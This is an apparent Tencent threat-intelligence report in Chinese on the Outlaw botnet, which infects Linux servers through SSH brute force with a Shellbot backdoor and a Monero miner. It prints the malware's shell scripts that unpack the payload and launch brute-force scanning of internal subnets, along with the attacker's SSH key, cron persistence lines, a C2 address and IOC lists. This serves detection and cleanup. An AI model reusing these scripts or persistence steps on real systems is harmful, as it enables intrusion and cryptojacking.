亡命徒(Outlaw)僵尸 *** 感染约2万台Linux服务器,腾讯安全提醒企业及时清除
感谢腾讯御见威胁情报中心来稿!
原文链接:https://mp.weixin.qq.com/s/4_E6kPuodxb3_inVCq2fqg
一、背景
腾讯安全威胁情报中心检测到国内大量企业遭遇亡命徒(Outlaw)僵尸 *** 攻击。亡命徒(Outlaw)僵尸 *** 最早于2018年被发现,其主要特征为通过SSH爆破攻击目标系统,同时传播基于Perl的Shellbot和门罗币挖矿木马。腾讯安全威胁情报中心安全大数据显示,亡命徒(Outlaw)僵尸 *** 已造成国内约2万台Linux服务器感染,影响上万家企业。
此次攻击传播的母体文件为dota3.tar.gz,可能为亡命徒(Outlaw)僵尸 *** 的第3个版本,母体文件释放shell脚本启动对应二进制程序,kswapd0负责进行门罗币挖矿,t *** 32、t *** 64负责继续SSH爆破攻击传播病毒。
亡命徒(Outlaw)僵尸 *** 之前通过利用Shellshock漏洞进行分发,因此被命名为“ Shellbot”。Shellbot利用物联网(IoT)设备和Linux服务器上的常见命令注入漏洞进行感染。Shellshock漏洞(CVE-2014-7169)是2014年在Bash command shell中发现的一个严重的漏洞,大多数Linux发行版通常会使用到该功能,攻击者可以在这些受影响的Linux服务器上远程执行代码。
亡命徒(Outlaw)僵尸 *** 利用SSH爆破入侵的攻击活动,可以被腾讯T-Sec高级威胁检测系统(御界)检测到:
腾讯T-Sec云防火墙可以检测亡命徒(Outlaw)僵尸 *** 的挖矿行为、Shellshock漏洞利用及暴力破解SSH登录口令等等攻击活动。
目前,Outlaw僵尸 *** 的影响仍在扩散,对企业服务器危害严重,腾讯安全系列产品已采取应急响应措施,执行清单如下:
场景
胁
情
报
威胁情报云查服务
(SaaS)
各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics
高级威胁追溯系统
网管可通过威胁追溯系统,分析日志,进行线索研判、追溯 *** 入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts
防护
(Cloud Firewall,CFW)
1)亡命徒(Outlaw)僵尸 *** 相关联的IOCs已支持识别检测;
2)云防火墙已支持对亡命徒(Outlaw)僵尸 *** 所采用挖矿协议的检测拦截、Shellshock漏洞利用检测以及采取SSH暴力破解的检测。
有关云防火墙的更多信息,可参考:
https://cloud.tencent.com/product/cfw
(Cloud Workload Protection,CWP)
2)已支持查杀亡命徒(Outlaw)僵尸 *** 相关的挖矿木马、后门程序。
腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp
(Vulnerability Scan Service,VSS)
2)腾讯漏洞扫描服务已支持检测全网资产是否受Shellshock漏洞CVE-2014-7169(UCS Manager相关)影响。
关于腾讯T-Sec漏洞扫描服务的更多信息,可参考:https://cloud.tencent.com/product/vss
关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html
高级威胁检测系统
(腾讯御界)
1)御界已支持通过协议特征检测亡命徒(Outlaw)僵尸 *** 的挖矿行为;
2)御界已支持检测SSH弱口令爆破攻击行为;
3)腾讯御界已支持检测Shellshock漏洞CVE-2014-7169、CVE-2014-6271。
关于T-Sec高级威胁检测系统的更多信息,可参考:
https://cloud.tencent.com/product/nta
腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力,关于T-Sec终端安全管理系统的更多资料,可参考:https://s.tencent.com/product/yd/index.html
更多产品信息,请参考腾讯安全官方网站https://s.tencent.com/
二、样本分析
Outlaw通过SSH爆破攻击,访问目标系统并下载带有shell脚本、挖矿木马、后门木马的TAR压缩包文件dota3.tar.gz。解压后的文件目录可以看到,根目录rsync下存放初始化脚本,a目录下存放shellbot后门,b目录下存放挖矿木马,c目录下存放SSH爆破攻击程序。
C目录下二进制文件t *** 32、t *** 64为SSH(22端口)扫描和爆破程序,并可以通过执行远程命名来下载和执行恶意程序。
爆破成功后执行base64编码的shell命令,主要功能为删除旧版本的恶意程序和目录,然后解压获取到的最新版本恶意程序并执行,内容如下:
命令1:
#!/bin/bash
cd /tmp
rm -rf .ssh
rm -rf .mountfs
rm -rf .X13-unix
rm -rf .X17-unix
rm -rf .X19-unix
rm -rf .X2*
mkdir .X25-unix
cd .X25-unix
mv ar/tmp/dota3.tar.gz dota3.tar.gz
tar xf dota3.tar.gz
sleep 3s && cd .rsync; cat /tmp/.X25-unix/.rsync/initall | bash 2>1&
sleep 45s && pkill -9 run && pkill -9 go && pkill -9 t ***
exit 0
命令2:
#!/bin/bash
cd /tmp
rm -rf .ssh
rm -rf .mountfs
rm -rf .X13-unix
rm -rf .X17-unix
rm -rf .X19-unix
rm -rf .X2*
mkdir .X25-unix
cd .X25-unix
mv ar/tmp/dota3.tar.gz dota3.tar.gz
tar xf dota3.tar.gz
sleep 3s && cd /tmp/.X25-unix/.rsync/c
nohup /tmp/.X25-unix/.rsync/cm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 192.168 >> /dev/null 2>1&
sleep 8m && nohup /tmp/.X25-unix/.rsync/cm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 172.16 >> /dev/null 2>1&
sleep 20m && cd ..; /tmp/.X25-unix/.rsync/initall 2>1&
exit 0
还会通过远程命令修改SSH公钥为:
AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw==
以便之后能更容易入侵。
B目录下run脚本主要内容为base64编码的shellbot后门程序,解码后可以看到代码仍然经过混淆。
把执行函数eval改为print可打印出解密后的代码,是基于Perl的Shellbot变种,连接C2服务器地址为45.9.148.99:443,能够执行多个后门命令,包括文件下载、执行shell cmd和DDoS攻击。如果接受到扫描端口命令,可针对以下端口进行扫描:”21″,”22″,”23″,”25″,”53″,”80″,”110″,”143″,”6665″。
A目录下二进制文件kswapd0为XMRig编译的Linux平台门罗币挖矿木马。
在初始化阶段会执行脚本init0来找到大量Linux平台竞品挖矿木马并进行清除。
在当前用户目录下创建/.configrc目录,拷贝a、b文件夹到该目录下并执行初始化脚本,然后通过写入cron.d安装计划任务进行持久化。写入定时任务如下:
1 1 */2 * * $dir2/a/upd>/dev/null 2>&1
@reboot $dir2/a/upd>/dev/null 2>&1
5 8 * * 0 $dir2/b/sync>/dev/null 2>&1
@reboot $dir2/b/sync>/dev/null 2>&1
0 0 */3 * * $dir/c/aptitude>/dev/null 2>&1
三、安全建议
建议企业Linux服务器管理员检查服务器资源占用情况,及时修改弱密码,避免被暴力破解。若发现服务器已被入侵安装挖矿木马,可参考以下步骤手动检查、清除:
1、 删除以下文件,杀死对应进程:
/tmp/*-unix/.rsync/a/kswapd0
*/.configrc/a/kswapd0
md5: 84945e9ea1950be3e870b798bd7c7559
/tmp/*-unix/.rsync/c/t *** 64
md5: 4adb78770e06f8b257f77f555bf28065
/tmp/*-unix/.rsync/c/t *** 32
md5: 10ea65f54f719bffcc0ae2cde450cb7a
2、 检查cron.d中是否存在包含以下内容的定时任务,如有进行删除:
/a/upd
/b/sync
/c/aptitude
IOCs
IP
45.9.148.99
45.55.57.6
188.166.58.29
104.236.228.46
165.227.45.249
192.241.211.94
188.166.6.130
142.93.34.237
46.101.33.198
149.202.162.73
167.71.155.236
157.245.83.8
45.55.129.23
46.101.113.206
37.139.0.226
159.203.69.48
104.131.189.116
159.203.102.122
159.203.17.176
91.121.51.120
128.199.178.188
208.68.39.124
45.55.210.248
206.81.10.104
5.230.65.21
138.197.230.249
107.170.204.148
Md5
URL
http[:]//45.55.57.6/dota3.tar.gz
http[:]//188.166.58.29/dota3.tar.gz
http[:]//104.236.228.46/dota3.tar.gz
http[:]//165.227.45.249/dota3.tar.gz
http[:]//192.241.211.94/dota3.tar.gz
http[:]//188.166.6.130/dota3.tar.gz
http[:]//142.93.34.237/dota3.tar.gz
http[:]//46.101.33.198/dota3.tar.gz
http[:]//149.202.162.73/dota3.tar.gz
http[:]//167.71.155.236/dota3.tar.gz
http[:]//157.245.83.8/dota3.tar.gz
http[:]//45.55.129.23/dota3.tar.gz
http[:]//46.101.113.206/dota3.tar.gz
http[:]//37.139.0.226/dota3.tar.gz
http[:]//159.203.69.48/dota3.tar.gz
http[:]//104.131.189.116/dota3.tar.gz
http[:]//159.203.102.122/dota3.tar.gz
http[:]//159.203.17.176/dota3.tar.gz
http[:]//91.121.51.120/dota3.tar.gz
http[:]//128.199.178.188/dota3.tar.gz
http[:]//208.68.39.124/dota3.tar.gz
http[:]//45.55.210.248/dota3.tar.gz
http[:]//206.81.10.104/dota3.tar.gz
http[:]//5.230.65.21/dota3.tar.gz
http[:]//138.197.230.249/dota3.tar.gz
http[:]//107.170.204.148/dota3.tar.gz
“亡命徒(Outlaw)僵尸 *** 感染约2万台Linux服务器,腾讯安全提醒企业及时清除” 的相关文章
精心伪造的微软客户支持和帮助文档实际上是窃取信息的 Vidar 恶意软件
网络安全公司Trustwave的安全团队SpiderLabs警告Windows用户,一个名为Vidar的新恶意软件活动将自己伪装成微软支持或帮助文件。因此,毫无戒心的用户可能很容易成为受害者,而Vidar是一个偷窃数据的恶意软件,可以窃取被利用者的信息。 微软编译的HTML帮助(CHM)文件虽然现在...
Google 发布第 3 个紧急更新 修复 Chrome 中另一个零日漏洞
Google 今天发布了第 3 个紧急更新,修复了存在于 Chrome 浏览器中的另一个零日漏洞。周四,Google 面向 macOS、Windows 和 Linux 发布了 Chrome 100.0.4898.127 更新,会在未来几天内完成部署。 本次更新修复了追踪为 CVE-2022-1364...
美将 Ronin 网络 6.25 亿美元加密货币被盗事件归咎于朝鲜黑客组织
据Vice的报道,美财政部将Ronin网络6.25亿美元加密货币被盗事件归咎于朝鲜黑客组织。据悉,该网络是支持Axie Infinity游戏的区块链。当地时间周四,财政部更新了制裁措施,其中包括收到资金的钱包地址并将其归于Lazarus集团。 开发商集团Sky Mavis拥有的Ronin网络在关于...
GitHub 透露:攻击者利用偷来的 OAuth 令牌入侵了几十个组织
GitHub今天透露,一名攻击者正在使用偷来的OAuth用户令牌(原本发放给Heroku和Travis-CI),从私人仓库下载数据。自2022年4月12日首次发现这一活动以来,威胁者已经从几十个使用Heroku和Travis-CI维护的OAuth应用程序(包括npm)的受害组织中访问并窃取数据。...
安全专家发现新型恶意 Windows 11 网站:镜像内含恶意文件
自 Windows 11 系统 2021 年 6 月发布以来,不断有各种活动欺骗用户下载恶意的 Windows 11 安装程序。虽然这种情况在过去一段时间里有所遏制,但现在又卷土重来,而且破坏力明显升级。 网络安全公司 CloudSEK 近日发现了一个新型恶意软件活动,看起来非常像是微软的官方网站...
犯罪集团持有超过 250 亿美元加密货币 它们来自众多非法来源
伦敦的大都会警察局(MPS)进行了英国有史以来最大的加密货币扣押,从一个涉嫌洗钱的人那里拿走了价值1.8亿英镑的加密货币。同时吗,美国司法部查封了与2016年Bitfinex黑客事件有关的价值36亿美元比特币,这是目前有史以来最大的加密货币或法币被盗资产的回收。 这些故事很重要,不仅因为它们允许对加...
评论列表
发表评论
